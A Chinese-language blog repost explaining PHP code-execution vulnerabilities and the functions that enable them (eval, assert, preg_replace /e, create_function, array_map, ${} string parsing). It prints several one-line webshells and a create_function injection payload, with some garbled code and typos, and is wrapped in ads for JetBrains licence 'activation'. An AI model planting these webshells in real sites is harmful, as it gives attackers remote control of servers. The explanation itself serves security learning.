大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE稳定放心使用
**
php代码执行函数解析
**
一、代码执行漏洞原理:
用户输入的数据被当做后端代码进行执行
<?php @eval($_REQUEST[8])?>//其实一句话木马的本质就是一个代码执行漏洞。用户输入的数据被当做代码进行执行。
这里提一下RCE(remote command/code execute)远程命令或者代码执行。现在只要渗透的最终情况可以实现执行命令或者是代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE
在PHP存在诸多函数可以做到代码执行。为了方便把要执行的代码写为$a
1.eval($a); //eval是代码执行用的最多的,他可以多行执行
eval(\$_REQUEST['a']);
2.assert($a); //只能单行执行
assert(\$_REQEUST['a'])
//如何多行执行呢
写文件然后执行,例如:
file_put_contents('1.php','<?php var_dump(8);phpinfo();?>')
3.preg_replace() //正则替换函数,
preg_replace(’/a/’,‘x’,‘abc’);
Eg
<?php echo preg_replace('/a/e',$_GET[8],'abc')?>
替换必须真实发生才会触发函数,不发生替换,不会触发。
4.creae_function() 匿名函数
$a = create_function(’$id’,‘echo $id;’);
echo a ( 8 ) ; 类 似 于 f u n c t i o n 函 数 名 ( a(8); 类似于 function函数名( a(8);类似于function函数名(id){echo $id;}
<?php
\$a = $_REQUEST['a'];
$f2 = create_function('',$a);
$f2();
?>
这里还可以不调用触发:
<?php
\$a = $_REQUEST['a'];
$f2 = create_function('',$a);
//?a=}phpinfo();
5.array_map //回调函数调用某个函数。
下图是这个函数的用法,调用cube函数,传参
一句话木马:
array_map('assert',array($_POST['a']));
array_map($_REQUSET['b'],$_REQUEST);
Eval 是无法调用的,因为eval比较特殊,不认为是函数属于特殊写法
call_user_func() 也可以回调,回调函数在php有很多。
6.特殊组合(双引号二次解析)
PHP版本5.5及其以上版本可以使用
“${phpinfo()}”; => 代码执行phpinfo()
php的字符串是可以使用复杂的表达式。例如${中间可以写调用的函数}
${
phpinfo()};
$a = ${
phpinfo()};
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/188414.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...